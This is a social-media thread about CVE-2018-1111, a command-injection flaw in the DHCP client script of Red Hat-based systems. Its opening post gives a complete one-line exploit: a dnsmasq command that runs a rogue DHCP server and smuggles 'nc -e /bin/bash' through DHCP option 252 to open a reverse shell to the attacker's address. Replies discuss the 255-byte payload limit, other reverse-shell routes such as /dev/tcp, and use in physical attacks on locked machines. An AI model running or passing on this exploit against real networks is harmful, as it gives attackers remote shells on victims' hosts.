Barkın Kılıç
CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc:
0day.marketing May 15
Replying to @Barknkilic @cnbrkbolat
YOU WIN 1 MILLION 0DAYs. SEND US YOUR WALLET AND WE'LL SEND YOU ONE MILLION 0DAYs.
Canberk Bolat May 15
I have a 0day to publish soon, would you help me to get my 0day brand?
0day.marketing May 15
Replying to @cnbrkbolat @Barknkilic
Sure! DM for inquiries 😎
Rich Felker May 15
Wait, option 252 is WPAD right? Does this mean RH is letting DHCP servers inject MITM?
Barkın Kılıç May 15
Uhuh, but if I could spoof the DHCP server, I wouldn't be going after the WPAD option for MITM :)
Rich Felker May 15
IIRC Windows browsers let you MITM TLS connections with WPAD. You can't do that with a rogue router/DHCP server without the client honoring WPAD.
Adam Barnes May 15
Is... Is this a parody?
Barkın Kılıç May 15
I would enjoy it more if this were a Windows bug, but since it is a Linux vulnerability, it still doesn't have any value in that area :) This is the reason I said I wouldn't go after the WPAD option.
Rich Felker May 15
Well if RH has this bug, I suspect they've implemented Windows-equivalent misfeatures...
0day.marketing May 15
It's a public service~ >100 people can't be wrong!
Barkın Kılıç May 15
Yeah, that's a good point, but you are missing the real point, which is that this vuln comes from the NetworkManager dispatcher script. The reason I used the WPAD option is that it is the only place I have successfully placed my RCE payload.
₳ᴆᴀᴍ May 15
Replying to @Barknkilic @cnbrkbolat
Looks like the "gaping security hole" version of netcat needs to be installed, am I reading this correctly? Is there any way to punch that reverse shell out without that version of nc installed?
Barkın Kılıç May 15
Replying to @nixhaxor @cnbrkbolat
Actually nc is the easiest way to create a tweetable PoC for this bug; in CentOS there is no nc in the default install and I can still exploit it with other reverse shell techniques. The only limitation is that your payload should be 255 bytes long.
₳ᴆᴀᴍ May 15
Replying to @Barknkilic @cnbrkbolat
Oh! I was wondering about /dev/tcp. Gotcha :)
➖Nɘt➖ May 15
Replying to @Barknkilic @cnbrkbolat
This is just overkill!! Imagine this shipped on a Pi Zero for physical attacks on locked computers! 🤩
➖Nɘt➖ May 15
It would be a nice update to poisontap ;)
Alain O'Dea May 15
Friends don’t let friends `while read` without `-r`.
Uncommon Criteria May 16
Replying to @Barknkilic @cnbrkbolat
This would be a good week to troll any visiting pen-testers who might happen to have RedHat-based VMs :)
Jan Wiescher May 16
Replying to @Barknkilic @cnbrkbolat
I have trouble finding any info on whether this exploit requires NetworkManager running on the victim host, since the bug is in the NetworkManager script for dhclient. Do you know if it does?